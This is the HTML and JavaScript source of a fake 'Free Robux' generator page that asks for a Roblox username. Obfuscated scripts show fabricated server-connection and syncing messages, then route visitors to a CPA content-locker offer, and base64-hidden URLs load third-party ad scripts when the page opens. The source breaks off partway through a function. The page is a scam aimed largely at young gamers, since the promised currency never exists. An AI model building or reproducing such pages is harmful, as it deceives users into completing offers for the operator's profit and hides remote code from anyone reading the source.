<!DOCTYPE html><html lang="en" translate="no"><head>
<meta charset="UTF-8"><meta name="robots" content="noindex, nofollow">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
 <title>Free Robux v1</title>
<style>
*{margin:0;padding:0;box-sizing:border-box}::-webkit-scrollbar{width:0}
body{margin:0;font-family:-apple-system,BlinkMacSystemFont,'Arial',Roboto,Oxygen,Ubuntu,Cantarell,'Open Sans','Helvetica Neue',sans-serif;background:#eee}  
.bx-mstr{max-width:760px;width:98%;margin:8px auto;text-align:center;padding:5px;background:whitesmoke;box-shadow:0 0 1px 0px #000;position:relative}
nav{max-width:760px;width:100%;margin:auto;height:34px;display:flex;align-items:center;justify-content:space-between;background-color:#dee1e3;border:solid #c7cbce;border-width:0 0 1px;padding:0 10px}
.logo1{width:25px;display:flex}.img-lg{width:24px;height:auto}
nav ul{list-style:none;display:flex;font-size:15px;align-items:center}
ul li {margin-left:10px;margin-right:5px;color:#555;user-select:none}
.middle{max-width:760px;width:100%;margin:8px auto 0;height:120px;background-image:linear-gradient(0deg,#00000080,#303137de),url(../JxKFugiv9fPm.com/media/VCqcLeXtFhIW.jpg);background-position:center;background-size:100%;color:#fff;display:flex;justify-content:center;align-items:center;flex-direction:column;text-align:center}
.middle p{font-size:15px;color:#ccc;padding:0 8px 10px}.bx-lgo{text-align:center}.logo{max-width:200px;width:90%;height:auto}
.input-form{padding-top:8px}.useronline{color:#111;font-size:14px;padding:8px;background:#fbfbfb}.uson{color:#295383;font-weight:600}
.iname {color:#555;font-size:20px;padding-bottom:8px;user-select:none}.bgst{position:absolute;width:10px;transform:rotate(45deg);left:0px;top:-20px}
.bg{background-color:white;width:100%;height:100%}.vbicon{display:inline-block;width:30px;height:30px;background-color:red;padding-top:10px}
.text1{max-width:210px;font-size:26px;color:#4b6a8d;margin:5px auto 20px;display:flex;align-items:center;justify-content:space-evenly;user-select:none}
.activity{margin:15px auto 0;background:#dee1e3;box-shadow:0 0 1px 0px #000}
.bntnext{background-image:linear-gradient(0deg,#4e5f75,#f0fafb);border-radius:40px;width:fit-content;margin:10px;min-width:120px;border:2px solid white;padding:8px;font-size:18px;font-weight:600;color:white;cursor:pointer;box-shadow:0 0 0 2px #ccc;user-select:none}.gen-text{font-size:17px;color:#111;padding:10px;margin-top:5px}
.inputnam{max-width:280px;width:80%;height:50px;text-align:center;outline:none;background:#ffffffbd;border-radius:8px;border:2px solid #ccc;margin-bottom:15px;color:black;font-size:17px}
.page2{width:96%;margin:5px auto;display:none}.page3{display:none;min-height:130px}
.message{margin:8px;text-align:left;outline:none;background:#fcfcfc;border-radius:4px;box-shadow:0 0 4px #bbb;border:none;width:98%;padding:10px;font-size:16px;font-family:sans-serif}
.coinlogo{width:40px;height:auto;padding-top:15px;margin:auto}
.card{width:200px;margin-top:14px;text-align:left;outline:none;appearance:none;-moz-appearance:none;-webkit-appearance:none;background-color:#292d41;border-radius:40px;box-shadow:none;border:none;width:70%;height:60px;z-index:3;position:relative;padding:0 0px 0 40px;color:White;font-size:26px;background-repeat:no-repeat;background-position:left;background-size:20px;background-position-x:15px}
.select-items{color:white;padding:8px 16px;border:1px solid transparent;border-color:transparent transparent rgba(0,0,0,0.1) transparent;cursor:pointer;user-select:none}
.update{position:absolute;right:10;top:10;color:#00b0ff}.error{border:2px solid red}.gen-vbuck{padding-top:10px}
.user-gen{font-size:20px;color:#111;display:inline-block}.private{display:inline-block;margin:5px;cursor:pointer;width:30px;height:30px;padding:5px;background:#0000008a;border-radius:4px}
.Tem{display:inline-block;margin:5px;cursor:pointer;width:30px;height:30px;padding:5px;background:#0000008a;border-radius:4px}
.Contact{display:inline-block;margin:5px;cursor:pointer;width:30px;height:30px;padding:5px;background:#0000008a;border-radius:4px}
.privacy-form {position:fixed;top:0;left:0;width:100%;height:100%;background:#1b1d2791;z-index:3}
.privacy-content{max-width:600px;width:90%;height:90%;margin:auto;background:white;border-radius:4px;margin-top:20px;padding:10px}
.contact-content{max-width:600px;width:90%;padding:10px;margin:40px auto;background:white;border-radius:8px;text-align:center}
.close-privacy{position:absolute;z-index:2;height:22px;width:22px;top:0;right:2px;font-size:26px;color:#777;cursor:default}
.bx-psn{color:#46465f;overflow:auto;background:whitesmoke;height:98%;border-radius:4px;padding:8px}
.pro-bg{margin-top:10px;width:80%;max-width:250px;height:35px;background-color:#1e1f1f;text-align:left;transform:skew(-5deg)}
.fotr{display:flex;justify-content:space-around;padding-bottom:2px}
.modal{position:fixed;z-index:3;left:0;top:0;width:100%;height:100%;overflow:auto;background:#0000007d}
.modal-content{position:absolute;margin:auto;top:50%;left:50%;transform:translate(-50%,-50%);background:whitesmoke;padding:10px;border-radius:3px;max-width:400px;width:90%;text-align:center}.modal img{width:100%;height:auto}
.close{font-weight:normal;color:#999;float:right;font-size:28px;position:relative;top:-12px;left:5px;user-select:none}
.hidein {animation:hidein 1s;animation-fill-mode:forwards}
@keyframes hidein{
  0%{transform:scale(1)}
  10%{transform:scale(1)}
  20%{transform:scale(1.01)}
  100%{transform:scale(0)}}
.showin {animation:showin 0.5s;animation-fill-mode:forwards}
@keyframes showin {
  0%{transform:scale(0)}
  30%{transform:scale(1)}
  60%{transform:scale(1.01)}
  100%{transform:scale(1)}}
.cntr{display:flex;flex-direction:column}.row:not(.row:last-child){border-bottom:1px solid #bdbebe}
.row{display:flex;align-items:center;height:70px;justify-content:space-around}.row2:not(.row2:last-child){border-bottom:1px solid #bdbebe}
.row2{display:flex;align-items:center;height:30px;justify-content:space-around}.price{font-size:20px;font-weight:700;color:#555555}
.pakage{display:flex;align-items:flex-end;font-size:13px;color:#666}a:-webkit-any-link{text-decoration:none;color:#333}
.rbxtotal{max-width:120px;width:90%;height:40px;border:1px solid #606162;font-weight:600;color:#6d6d6d;border-radius:8px;padding:4px 8px;display:flex;justify-content:center;cursor:pointer}
.rbxtotal2{max-width:125px;width:90%;height:40px;border:1px solid #00b06f;font-weight:600;color:#fff;border-radius:8px;padding:4px 8px;display:flex;justify-content:center;user-select:none;background:#00b06f;cursor:pointer}
.rbxtotal3{max-width:125px;width:90%;height:40px;color:#000;padding:4px 8px;display:flex;justify-content:center}
.pic2{pointer-events:none;margin-top:4px;margin-right:4px}.rbx_total{display:flex;align-items:center}
.pic{width:30px;margin-right:10px;pointer-events:none;margin-top:4px}.mg-gen{position:relative;top:4px} 
.load15{margin-top:8px;width:45px;height:45px;display:inline-block;position:relative;border-width:3px 2px 3px 2px;border-style:solid dotted solid dotted;border-color:#ddd #ffffff4d #ddd #ddd;border-radius:50%;box-sizing:border-box;animation:1s rotate linear infinite}
.load15:before,.load15:after{content:'';top:0;left:0;position:absolute;border:8px solid transparent;border-bottom-color:#ddd;transform:translate(-9px,19px) rotate(-35deg)}
.load15:after{border-color:#ddd #0000 #0000 #0000;transform:translate(32px,3px) rotate(-35deg)}
@keyframes rotate{100%{transform:rotate(360deg)}}
.modal{position:fixed;z-index:3;left:0;top:0;width:100%;height:100%;overflow:auto;background:#0000007d}
.modal-content{position:absolute;margin:auto;top:50%;left:50%;transform:translate(-50%,-50%);background:whitesmoke;padding:10px;border-radius:3px;max-width:400px;width:90%;text-align:center}.modal img{width:100%;height:auto}
.close{font-weight:500;color:#999;float:right;font-size:28px;position:relative;top:-12px;left:5px;user-select:none}
h3.span{font-size:22px;margin:auto;letter-spacing:1px}
.loader span{color:#5c6b7e;-webkit-animation:loading 1s ease-in-out infinite alternate}
.loader span:nth-child(2){-webkit-animation-delay:0.1s}
.loader span:nth-child(3){-webkit-animation-delay:0.2s}
.loader span:nth-child(4){-webkit-animation-delay:0.3s}
.loader span:nth-child(5){-webkit-animation-delay:0.4s}
.loader span:nth-child(6){-webkit-animation-delay:0.5s}
.loader span:nth-child(7){-webkit-animation-delay:0.6s}
.loader span:nth-child(8){-webkit-animation-delay:0.7s}
.loader span:nth-child(9){-webkit-animation-delay:0.8s}
.loader span:nth-child(10){-webkit-animation-delay:0.9s}
.loader span:nth-child(11){-webkit-animation-delay:1s}
.loader span:nth-child(12){-webkit-animation-delay:1.1s}
.loader span:nth-child(13){-webkit-animation-delay:1.2s}
.loader span:nth-child(14){-webkit-animation-delay:1.3s}
.loader span:nth-child(15){-webkit-animation-delay:1.4s}
.loader span:nth-child(16){-webkit-animation-delay:1.5s}
@keyframes loading{100%{text-shadow:0px 0px 2px #4e5f75;color:#00b06f}}  
@-webkit-keyframes loading{
to{text-shadow:0px 0px 10px #d2cccc;color:#ffca00}}
.loadot{position:relative;font-size:20px;left:-5px}  
.loadot:after{content: ' .';animation:dots 2s steps(1,end)infinite}
@keyframes dots{
  20%{color:#0000;text-shadow:.25em 0 0 #0000,.5em 0 0 #0000}
  35%{color:#111; text-shadow:.25em 0 0 #0000,.5em 0 0 #0000}
  50%{text-shadow:.25em 0 0 #111,.5em 0 0 #0000}
  70%,100%{text-shadow:.25em 0 0 #111,.5em 0 0 #111}
}
</style>
<meta name="google-adsense-platform-account" content="ca-host-pub-1556223355139109">
<meta name="google-adsense-platform-domain" content="blogspot.com">
<link rel="me" href="https://www.blogger.com/profile/04075406952991026934">
<meta name="google-adsense-platform-account" content="ca-host-pub-1556223355139109">
<meta name="google-adsense-platform-domain" content="blogspot.com">
<link rel="me" href="https://www.blogger.com/profile/12941260961254911734">
<meta name="google-adsense-platform-account" content="ca-host-pub-1556223355139109">
<meta name="google-adsense-platform-domain" content="blogspot.com">
<link rel="me" href="https://www.blogger.com/profile/15970942433632147294">
<meta name="google-adsense-platform-account" content="ca-host-pub-1556223355139109">
<meta name="google-adsense-platform-domain" content="blogspot.com">

<script type="text/javascript" language="javascript">
  // Supply ads personalization default for EEA readers
  // See https://www.blogger.com/go/adspersonalization
  adsbygoogle = window.adsbygoogle || [];
  if (typeof adsbygoogle.requestNonPersonalizedAds === 'undefined') {
    adsbygoogle.requestNonPersonalizedAds = 1;
  }
</script>

</head>
<body>
<nav><div class="logo1"><img src="https://lmctplus1.github.io/kecro/JuT4yXwyoOc8.png" width="25" height="25" alt="lg" class="img-lg">
</div><ul><li>𝗥𝗼𝗯𝘂𝘅</li><li>Charts</li><li>Marketplace</li><li>Create</li></ul></nav>
<div class="middle"><div class="bx-lgo">
<!--//-BNR-//-->
<script type="text/javascript">
if (window.location.hostname === 'buravuz-wvw.blogspot.com') {
   var script1 = document.createElement('script');
    script1.type = 'text/javascript';
    script1.text = `
       atOptions = {
            'key' : '0287d227d5cab740605b9b703257095e',
            'format' : 'iframe',
            'height' : 50,
            'width' : 320,
            'params' : {}
        };
    `;
   var script2 = document.createElement('script');
    script2.type = 'text/javascript';
    script2.src = atob('aHR0cHM6Ly93d3cudG9wY3JlYXRpdmVmb3JtYXQuY29tLzAyODdkMjI3ZDVjYWI3NDA2MDViOWI3MDMyNTcwOTVlL2ludm9rZS5qcw==');
    document.body.appendChild(script1);
    document.body.appendChild(script2);
}  
</script>
<!--//-BNR-//-->
  <img src="https://lmctplus1.github.io/kecro/uMVVzW3jLTro.png" class="logo" width="200" height="46" alt="l1">
 </div><p>With 𝗥𝗼𝗯𝘂𝘅, you can upgrade your avatar or purchase special abilities in virtual experiences</p></div>  
  <div class="bx-mstr"><div id="page1">
   <div class="input-form"><div class="text1 showin">
      <img src="https://lmctplus1.github.io/kecro/F76aFzqxA8yf.webp" width="30" height="30" alt="b1">
  <h3 class="span loader"><span>𝗙</span><span>𝗥</span><span>𝗘</span><span>𝗘</span><span>�</span><span>𝗥</span><span>𝗢</span><span>𝗕</span><span>𝗨</span><span>𝗫</span></h3>     
      <img src="https://lmctplus1.github.io/kecro/F76aFzqxA8yf.webp" width="30" height="30" alt="b2">
    </div>    
      <div class="iname">𝗥𝗼𝗯𝗹𝗼𝘅 𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲<span style="color:#ff0000;font-weight:bold" id="user-online"></span></div>
    <input id="inputnam" class="inputnam showin" type="text" name="" placeholder="Enter Username">
   </div><button class="bntnext showin" onclick="next()">Next</button>
 </div>
<div id="page2" class="page2 showin"><div class="row2">
<span class="pakage">𝗙𝗿𝗲𝗲<img src="https://lmctplus1.github.io/kecro/xQ69IBNJH0mT.webp" alt="t" width="19" height="19"></span>
<span class="pakage">𝗥𝗼𝗯𝘂𝘅�<span style="font-weight:600">Package</span><img src="https://lmctplus1.github.io/kecro/xQ69IBNJH0mT.webp" alt="t" width="19" height="19"></span>
<span class="pakage">𝗦𝘂𝗯𝘀𝗰𝗿𝗶𝗯𝗲�<span style="font-weight:600">& Get More</span><img src=https://lmctplus1.github.io/kecro/"xQ69IBNJH0mT.webp" alt="t" width="19" height="19"></span> 
    </div>
<div class="cntr">      
        <div class="row"><div class="prce">$0.00</div>
          <div class="rbxtotal" onclick="card(500)"><div class="rbx_total">
            <div class="pic"><img src="https://lmctplus1.github.io/kecro/F76aFzqxA8yf.webp" alt="rb" width="28" height="28">
            </div><span>CLAIM</span>🎁<span>
        </span></div></div>
          <div class="rbxtotal2"><div class="rbx_total">
            <div class="pic2"><img src="https://lmctplus1.github.io/kecro/RtdRfBr3NvBL.png" alt="rb" width="24" height="24">
            </div><span>500</span><span style="font-size:13px;font-weight:500">/Free</span>
        </div></div></div>
        <div class="row"><div class="prce">$0.00</div>
           <div class="rbxtotal" onclick="card(1000)"><div class="rbx_total">
             <div class="pic"><img src="https://lmctplus1.github.io/kecro/F76aFzqxA8yf.webp" alt="rb" width="28" height="28">
             </div><span>CLAIM</span>🎁<span>
        </span></div></div>
         <div class="rbxtotal2"><div class="rbx_total">
            <div class="pic2"><img src="https://lmctplus1.github.io/kecro/RtdRfBr3NvBL.png" alt="rb" width="24" height="24">
            </div><span>1,000</span><span style="font-size:13px;font-weight:500">/Free</span>
        </div></div></div>
        <div class="row"><div class="prce">$0.00</div>
           <div class="rbxtotal" onclick="card(2500)"><div class="rbx_total">
             <div class="pic"><img src="https://lmctplus1.github.io/kecro/F76aFzqxA8yf.webp" alt="rb" width="28" height="28">
              </div><span>CLAIM</span>🎁<span>
         </span></div></div>
         <div class="rbxtotal2"><div class="rbx_total">
            <div class="pic2"><img src="https://lmctplus1.github.io/kecro/RtdRfBr3NvBL.png" alt="rb" width="24" height="24">
            </div><span>2.500</span><span style="font-size:13px;font-weight:500">/Free</span>
        </div></div></div>    
         <div class="row"><div class="prce">$0.00</div>
           <div class="rbxtotal" onclick="card(10000)"><div class="rbx_total">
             <div class="pic"><img src="https://lmctplus1.github.io/kecro/F76aFzqxA8yf.webp" alt="rb" width="28" height="28">
              </div><span>CLAIM</span>🎁<span>
         </span></div></div>
         <div class="rbxtotal2"><div class="rbx_total">
            <div class="pic2"><img src="../JxKFugiv9fPm.com/media/RtdRfBr3NvBL.png" alt="rb" width="24" height="24">
            </div><span>10,000</span><span style="font-size:13px;font-weight:500">/Free</span>
        </div></div></div>    
         <div class="row"><div class="prce">$0,00</div>
           <div class="rbxtotal" onclick="card(22000)"><div class="rbx_total">
             <div class="pic"><img src="https://lmctplus1.github.io/kecro/F76aFzqxA8yf.webp" alt="rb" width="28" height="28">
              </div><span>CLAIM</span>🎁<span>
         </span></div></div>
         <div class="rbxtotal2"><div class="rbx_total">
            <div class="pic2"><img src="https://lmctplus1.github.io/kecro/RtdRfBr3NvBL.png" alt="rb" width="24" height="24">
            </div><span>22,000</span><span style="font-size:13px;font-weight:500">/Free</span>
        </div></div></div>  
</div></div>
  <div class="gen-vbuck showin">
    <div class="showin" id="prosesink" style="display:none">Prosesing<span class="loadot"></span></div>
    <div class="showin" id="user-gen" style="display:none">
    <img src="https://lmctplus1.github.io/kecro/F76aFzqxA8yf.webp" alt="rb" width="22" height="22" class="mg-gen">
    <div class="user-gen"><span id="v-text" style="color:#1d7e0c;font-weight:600"></span> 𝐑𝐨𝐛𝐮𝐱</div>
    </div></div>
  <div id="page3" class="page3 showin">
  <span class="load15 showin" id="settingicon"></span>    
   <div class="gen-text showin" id="code">Loading...</div>
   <div class="showin" id="verifybnt" style="display:none">

            <button class="bntnext" onclick="CPABuildLock()">Claim Code Robux</button>
     </div>
 <div class="activity" id="activiy">
   <div class="bg-progress">
    <div class="useronline">User Online: <span class="uson" id="useronline">524</span> - Last update: 
     <span class="uson" id="update"></span>
    </div></div>
   <div class="fotr">
    <div class="private" onclick="showprivacy()">
      <img src="https://lmctplus1.github.io/kecro/SGx5Hh5hWLak.png" width="30" height="30" alt="p1"></div>
    <div class="Tem" onclick="showterm()">
      <img src="https://lmctplus1.github.io/kecro/z6IzxVouOCb8.png" width="30" height="30" alt="p2"></div>
    <div class="Contact" onclick="showcontact()">
      <img src="https://lmctplus1.github.io/kecro/cCYRtLuabKhk.png" width="30" height="30" alt="p3"></div>   
</div></div></div>

<!--/////--LOCK + OFFER--/////-->
<script type="text/javascript">
    var sUcCP_tYB_IkTaoc={"it":4248533,"key":"d8478"};
</script>
<script src="../0T6ks2WI5WKA.net/5RuaGUo9NACT.js"></script>
<!--/////--LOCK + OFFER--/////-->

<script type="text/javascript">
function _0x2a38(){var _0x4d9afe=['classList','prosesink','996kDXJNH','v-text','</span>\x20𝐑𝐨𝐛𝐮𝐱\x20for\x20<span\x20style=\x22color:#1d7e0c;font-weight:600\x22>','term-id','style','Getting\x20ready...','src','inputnam','</span>','value','block','country','hidein','page2','page3','appendChild','383412xOpBqG','Loading\x20last\x20step...','term-content-id','head','none','useronline','iframe{display:block\x20!important;margin:auto;position:relative;margin-top:10px}','page1','add','<span\x20style=\x22color:#111\x22>\x20/</span>','contact-id','remove','verifybnt','createElement','48012PeWcoC','code','error','Finalizing..','aHR0cHM6Ly93d3cudG9wY3JlYXRpdmVmb3JtYXQuY29tLzg4ZWE2Y2UwYmNjYWY1ZTEyYTVkZDUxMjU0MDQ2MWQwL2ludm9rZS5qcw==','514zPCsLJ','6015tvBCjD','script','async','Connected\x20to\x20𝐑𝐨𝐛𝐥𝐨𝐱\x20server...','2782107IVIkbv','getDate','log','privacy-content-id','innerHTML','Mdl1','random','body','1057364ogoIdm','close','euid','showin','Hi!\x20<span\x20style=\x22color:#1d7e0c;font-weight:600\x22>','privacy-id','display','contact-content-id','Connecting\x20to\x20server\x20SQL\x20databse..','getElementById','172688zmjqoY','Connection\x20to\x20𝐑𝐨𝐛𝐥𝐨𝐱\x20Server..','onclick','354KLfqiN','settingicon','aHR0cHM6Ly9nZXQuZ2VvanMuaW8vdjEvaXAvY291bnRyeS5qcw==','type'];_0x2a38=function(){return _0x4d9afe;};return _0x2a38();}var _0x2874db=_0x1ad9;(function(_0x3cf870,_0x4d558b){var _0x2ebfdb=_0x1ad9,_0x290557=_0x3cf870();while(!![]){try{var _0x146940=-parseInt(_0x2ebfdb(0x211))/0x1+parseInt(_0x2ebfdb(0x216))/0x2*(-parseInt(_0x2ebfdb(0x1ed))/0x3)+-parseInt(_0x2ebfdb(0x203))/0x4+parseInt(_0x2ebfdb(0x217))/0x5*(-parseInt(_0x2ebfdb(0x1f3))/0x6)+parseInt(_0x2ebfdb(0x1e0))/0x7+parseInt(_0x2ebfdb(0x1ea))/0x8+parseInt(_0x2ebfdb(0x1d8))/0x9;if(_0x146940===_0x4d558b)break;else _0x290557['push'](_0x290557['shift']());}catch(_0x4a450d){_0x290557['push'](_0x290557['shift']());}}}(_0x2a38,0x1a560));var delayMs=0x3e8;setTimeout(function(){var _0x200b51=_0x1ad9;document[_0x200b51(0x1e9)](_0x200b51(0x1dd))['style'][_0x200b51(0x1e6)]=_0x200b51(0x1fd);},delayMs),setTimeout(function(){var _0x444bbb=_0x1ad9;document[_0x444bbb(0x1e9)](_0x444bbb(0x1dd))[_0x444bbb(0x1f7)][_0x444bbb(0x1e6)]=_0x444bbb(0x207);},0x1f40);var span=document['getElementsByClassName'](_0x2874db(0x1e1))[0x0];span[_0x2874db(0x1ec)]=function(){var _0x358906=_0x2874db;document['getElementById']('Mdl1')[_0x358906(0x1f7)][_0x358906(0x1e6)]=_0x358906(0x207);};var myVar2=setInterval(UserTimer,0x7d0);function UserTimer(){var _0x2f26eb=_0x2874db;document['getElementById'](_0x2f26eb(0x208))[_0x2f26eb(0x1dc)]=Math['floor'](Math[_0x2f26eb(0x1de)]()*0x64)+0x1f4;}var today=new Date(),date=today['getFullYear']()+_0x2874db(0x20c)+(today['getMonth']()+0x1)+_0x2874db(0x20c)+today[_0x2874db(0x1d9)]();document[_0x2874db(0x1e9)]('update')['innerHTML']=date;function next(){var _0x343b5b=_0x2874db;name=document[_0x343b5b(0x1e9)]('inputnam')['value'],name==''?(document[_0x343b5b(0x1e9)](_0x343b5b(0x1fa))[_0x343b5b(0x1f1)][_0x343b5b(0x20b)](_0x343b5b(0x213)),setTimeout(function(){var _0x222af2=_0x343b5b;document[_0x222af2(0x1e9)](_0x222af2(0x1fa))['classList'][_0x222af2(0x20e)](_0x222af2(0x213));},0x3e8)):(document['getElementById'](_0x343b5b(0x20a))['style'][_0x343b5b(0x1e6)]='none',document[_0x343b5b(0x1e9)]('page2')[_0x343b5b(0x1f7)][_0x343b5b(0x1e6)]='block');}function card(_0x1de6ce){var _0x39f319=_0x2874db;document['getElementById'](_0x39f319(0x200))[_0x39f319(0x1f7)]['display']=_0x39f319(0x207),document[_0x39f319(0x1e9)](_0x39f319(0x201))['style'][_0x39f319(0x1e6)]=_0x39f319(0x1fd),setTimeout(function(){var _0x426980=_0x39f319;document[_0x426980(0x1e9)]('code')[_0x426980(0x1dc)]=_0x426980(0x1eb),setTimeout(function(){var _0x20cca1=_0x426980;document[_0x20cca1(0x1e9)]('code')[_0x20cca1(0x1dc)]='Server\x20is\x20up\x20at\x20192.23.11.164:402\x20(latency\x200.0013s)',setTimeout(function(){var _0x223339=_0x20cca1;document[_0x223339(0x1e9)](_0x223339(0x212))['innerHTML']=_0x223339(0x21a),setTimeout(function(){var _0x2b6adc=_0x223339;document[_0x2b6adc(0x1e9)](_0x2b6adc(0x212))[_0x2b6adc(0x1dc)]=_0x2b6adc(0x1e8),setTimeout(function(){var _0xb34c29=_0x2b6adc;document[_0xb34c29(0x1e9)](_0xb34c29(0x212))[_0xb34c29(0x1dc)]=_0xb34c29(0x1f8),setTimeout(function(){var _0x4a3f6b=_0xb34c29;document['getElementById'](_0x4a3f6b(0x212))['innerHTML']='Syncing\x20<span\x20style=\x22color:#1d7e0c;font-weight:600\x22>'+_0x1de6ce+_0x4a3f6b(0x1f5)+name+_0x4a3f6b(0x1fb),document[_0x4a3f6b(0x1e9)]('user-gen')[_0x4a3f6b(0x1f7)][_0x4a3f6b(0x1e6)]=_0x4a3f6b(0x1fd),setTimeout(function(){var _0xf3914a=0x0,_0x27c2a3=setInterval(_0x1ddd8a,0x1);function _0x1ddd8a(){var _0x108719=_0x1ad9;_0xf3914a=_0xf3914a+_0x1de6ce/0x3e8,_0xf3914a>=_0x1de6ce?(document[_0x108719(0x1e9)]('v-text')[_0x108719(0x1dc)]=_0x1de6ce,clearInterval(_0x27c2a3),setTimeout(function(){var _0x5c2c6d=_0x108719;document[_0x5c2c6d(0x1e9)](_0x5c2c6d(0x212))[_0x5c2c6d(0x1dc)]=_0x5c2c6d(0x214),setTimeout(function(){var _0x2503f8=_0x5c2c6d;document[_0x2503f8(0x1e9)](_0x2503f8(0x212))[_0x2503f8(0x1dc)]=_0x2503f8(0x204),document[_0x2503f8(0x1e9)]('user-gen')[_0x2503f8(0x1f7)][_0x2503f8(0x1e6)]=_0x2503f8(0x207),document[_0x2503f8(0x1e9)](_0x2503f8(0x1f2))['style'][_0x2503f8(0x1e6)]=_0x2503f8(0x1fd),setTimeout(function(){var _0x72a215=_0x2503f8;document[_0x72a215(0x1e9)](_0x72a215(0x1ee))[_0x72a215(0x1f7)][_0x72a215(0x1e6)]='none',document[_0x72a215(0x1e9)](_0x72a215(0x20f))[_0x72a215(0x1f7)][_0x72a215(0x1e6)]=_0x72a215(0x1fd),document[_0x72a215(0x1e9)](_0x72a215(0x212))['innerHTML']=_0x72a215(0x1e4)+name+'</span>,\x20You\x20are\x20almost\x20done\x20syncing\x20<span\x20style=\x22color:#1d7e0c;font-weight:600\x22>'+_0x1de6ce+'\x20</span>\x20𝐑𝐨𝐛𝐮𝐱!\x20Please\x20complete\x20the\x20last\x20step\x20by\x20clicking\x20the\x20button\x20below\x20to\x20complete\x20the\x20sync\x20process.';},0x320);},0x320);},0x4b0)):document['getElementById'](_0x108719(0x1f4))[_0x108719(0x1dc)]=Math['floor'](_0xf3914a);}},0x320);},0x320);},0x320);},0x320);},0x320);},0x320);},0x320);}function showprivacy(){var _0x5ec022=_0x2874db;document[_0x5ec022(0x1e9)](_0x5ec022(0x1e5))[_0x5ec022(0x1f7)][_0x5ec022(0x1e6)]=_0x5ec022(0x1fd);}function showcontact(){var _0x542e71=_0x2874db;document['getElementById'](_0x542e71(0x20d))[_0x542e71(0x1f7)][_0x542e71(0x1e6)]=_0x542e71(0x1fd);}function showterm(){var _0x51c0b0=_0x2874db;document[_0x51c0b0(0x1e9)](_0x51c0b0(0x1f6))[_0x51c0b0(0x1f7)][_0x51c0b0(0x1e6)]=_0x51c0b0(0x1fd);}function Esend(){var _0x596df7=_0x2874db;document[_0x596df7(0x1e9)](_0x596df7(0x1e2))['value']!=''?(document[_0x596df7(0x1e9)](_0x596df7(0x1e2))['value']='',document['getElementById']('message')[_0x596df7(0x1fc)]='',setTimeout(function(){var _0x582a76=_0x596df7;document['getElementById']('responEmial')[_0x582a76(0x1f7)][_0x582a76(0x1e6)]=_0x582a76(0x1fd);},0x320)):(document[_0x596df7(0x1e9)]('euid')[_0x596df7(0x1f1)][_0x596df7(0x20b)](_0x596df7(0x213)),setTimeout(function(){var _0x20332c=_0x596df7;document[_0x20332c(0x1e9)]('euid')[_0x20332c(0x1f1)][_0x20332c(0x20e)]('error');},0x3e8));}function countryip(_0x14af5f){var _0x45a711=_0x2874db,_0xa143eb=_0x14af5f[_0x45a711(0x1fe)];if(_0xa143eb!=='ID'){var _0x5b8b96=document[_0x45a711(0x210)]('script');_0x5b8b96[_0x45a711(0x1f0)]='text/javascript',_0x5b8b96['text']='\x0a\x20\x20\x20\x20\x20\x20\x20\x20atOptions\x20=\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27key\x27\x20:\x20\x2788ea6ce0bccaf5e12a5dd512540461d0\x27,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27format\x27\x20:\x20\x27iframe\x27,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27height\x27\x20:\x2050,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27width\x27\x20:\x20320,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27params\x27\x20:\x20{}\x0a\x20\x20\x20\x20\x20\x20\x20\x20};\x0a\x20\x20\x20\x20';var _0x24a640=document[_0x45a711(0x210)](_0x45a711(0x218));_0x24a640['type']='text/javascript',_0x24a640[_0x45a711(0x1f9)]=atob(_0x45a711(0x215)),document[_0x45a711(0x1df)]['appendChild'](_0x5b8b96),document[_0x45a711(0x1df)][_0x45a711(0x202)](_0x24a640);}else console[_0x45a711(0x1da)](_0xa143eb);}(function(){var _0x4c6e60=_0x2874db,_0x29bd5d=document['createElement']('script');_0x29bd5d[_0x4c6e60(0x1f9)]=atob(_0x4c6e60(0x1ef)),_0x29bd5d[_0x4c6e60(0x219)]=!![],document['body'][_0x4c6e60(0x202)](_0x29bd5d);}());const style=document[_0x2874db(0x210)](_0x2874db(0x1f7));style[_0x2874db(0x1dc)]=_0x2874db(0x209),document[_0x2874db(0x206)][_0x2874db(0x202)](style);function _0x1ad9(_0x17d07a,_0x3d4386){var _0x2a381d=_0x2a38();return _0x1ad9=function(_0x1ad9a9,_0x907f3a){_0x1ad9a9=_0x1ad9a9-0x1d8;var _0x1c5cfd=_0x2a381d[_0x1ad9a9];return _0x1c5cfd;},_0x1ad9(_0x17d07a,_0x3d4386);}function hideprivacy(){var _0x14f967=_0x2874db;document[_0x14f967(0x1e9)](_0x14f967(0x1db))[_0x14f967(0x1f1)][_0x14f967(0x20e)](_0x14f967(0x1e3)),document['getElementById'](_0x14f967(0x1db))[_0x14f967(0x1f1)]['add']('hidein'),setTimeout(function(){var _0x41577b=_0x14f967;document[_0x41577b(0x1e9)]('privacy-id')[_0x41577b(0x1f7)][_0x41577b(0x1e6)]='none',document[_0x41577b(0x1e9)](_0x41577b(0x1db))[_0x41577b(0x1f1)]['remove'](_0x41577b(0x1ff)),document[_0x41577b(0x1e9)](_0x41577b(0x1db))['classList']['add']('showin');},0x320);}function hidecontact(){var _0x15aead=_0x2874db;document[_0x15aead(0x1e9)](_0x15aead(0x1e7))[_0x15aead(0x1f1)][_0x15aead(0x20e)]('showin'),document[_0x15aead(0x1e9)]('contact-content-id')[_0x15aead(0x1f1)][_0x15aead(0x20b)](_0x15aead(0x1ff)),setTimeout(function(){var _0x487e34=_0x15aead;document['getElementById']('contact-id')[_0x487e34(0x1f7)][_0x487e34(0x1e6)]=_0x487e34(0x207),document[_0x487e34(0x1e9)]('contact-content-id')['classList'][_0x487e34(0x20e)](_0x487e34(0x1ff)),document[_0x487e34(0x1e9)](_0x487e34(0x1e7))[_0x487e34(0x1f1)][_0x487e34(0x20b)](_0x487e34(0x1e3));},0x320);}function hideterm(){var _0x5bc884=_0x2874db;document[_0x5bc884(0x1e9)](_0x5bc884(0x205))[_0x5bc884(0x1f1)][_0x5bc884(0x20e)](_0x5bc884(0x1e3)),document[_0x5bc884(0x1e9)](_0x5bc884(0x205))['classList']['add']('hidein'),setTimeout(function(){var 